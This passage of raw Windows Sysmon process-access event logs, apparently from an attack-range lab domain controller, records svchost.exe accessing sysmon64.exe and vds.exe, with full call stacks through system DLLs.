15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001338Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001337Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001336Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001335Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001334Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001333Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001332Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001331Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001330Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001329Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001328Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001327Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.894{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3A00-000000008801}3612C:\Windows\System32\vds.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001326Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001325Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001324Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001323Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001322Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001321Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001320Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001319Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001318Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001317Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001316Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001315Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.878{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+